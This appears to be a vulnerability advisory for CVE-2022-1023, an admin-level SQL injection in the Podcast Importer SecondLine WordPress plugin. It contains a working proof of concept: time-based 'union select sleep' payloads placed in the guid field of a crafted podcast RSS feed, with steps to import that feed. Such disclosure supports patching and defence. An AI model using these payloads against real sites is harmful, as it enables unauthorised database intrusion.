Podcast Importer SecondLine < 1.3.8 – Admin+ SQLi | CVE 2022-1023

Description

The plugin does not sanitise and properly escape some imported data, which could allow SQL injection attacks to be performed by imported a malicious podcast file

Proof of Concept

Put the XML below on a web server (replacing the PAYLOAD with the correct one), then import a podcast (/wp-admin/tools.php?page=secondlinepodcastimport) and put the URL to the XML in the Podcast Feed URL field and click import

Payloads:
v < 1.3.0 - https://satchmo.secondlinethemes.com/?p=82%') union select (sleep(10));#
v < 1.3.8 - <![CDATA[https://satchmo.secondlinethemes.com/?p=82%") union select (sleep(5))#]]>

<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl"
href="https://dixie.secondlinethemes.com/wp-content/plugins/seriously-
simple-podcasting/templates/feed-stylesheet.xsl"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0">
    <channel>
        <title>Dixie WordPress Theme</title>
        <atom:link href="https://dixie.secondlinethemes.com/feed/podcast" rel="self" type="application/rss+xml" />
        <link>https://dixie.secondlinethemes.com/</link>
        <description>A Powerful Podcasting Theme</description>
        <lastBuildDate>Mon, 09 Nov 2020 10:08:04 +0000</lastBuildDate>
        <language>en-US</language>
        <copyright>© 2021 Dixie WordPress Theme</copyright>
        <itunes:subtitle>A Powerful Podcasting Theme</itunes:subtitle>
        <itunes:author>Dixie WordPress Theme</itunes:author>
        <itunes:summary>A Powerful Podcasting Theme</itunes:summary>
        <itunes:owner>
            <itunes:name>Dixie WordPress Theme</itunes:name>
            <itunes:email>gotyed@gmail.com</itunes:email>
        </itunes:owner>
        <itunes:explicit>clean</itunes:explicit>
        <googleplay:author>Dixie WordPress Theme</googleplay:author>
        <googleplay:email>gotyed@gmail.com</googleplay:email>
        <googleplay:description>A Powerful Podcasting Theme</googleplay:description>
        <googleplay:explicit>No</googleplay:explicit>
        <item>
            <title>Episode 10: New Recording Studios</title>
            <link>https://dixie.secondlinethemes.com/podcast/episode-10-new-recording-studios/</link>
            <pubDate>Wed, 24 Jul 2019 11:16:50 +0000</pubDate>
            <dc:creator>Dixie</dc:creator>
            <guid isPermaLink="false">PAYLOAD</guid>
			<description>
				<![CDATA[aa]]>
			</description>
            <itunes:subtitle>
                <![CDATA[aa]]>
			</itunes:subtitle>
            <content:encoded>
                <![CDATA[aa]]>
			</content:encoded>
            <enclosure url="https://dixie.secondlinethemes.com/podcast-download/82episode-10-new-recording-studios.mp3" length="5425142" type="audio/mpeg"></enclosure>
            <itunes:summary>
                <![CDATA[aa]]>
			</itunes:summary>
            <itunes:explicit>clean</itunes:explicit>
            <itunes:block>no</itunes:block>
            <itunes:duration>02:16</itunes:duration>
            <itunes:author>Dixie</itunes:author>
            <googleplay:description>
                <![CDATA[aa]]>
			</googleplay:description>
			<googleplay:explicit>No</googleplay:explicit>
			<googleplay:block>no</googleplay:block>
        </item>
    </channel>
</rss>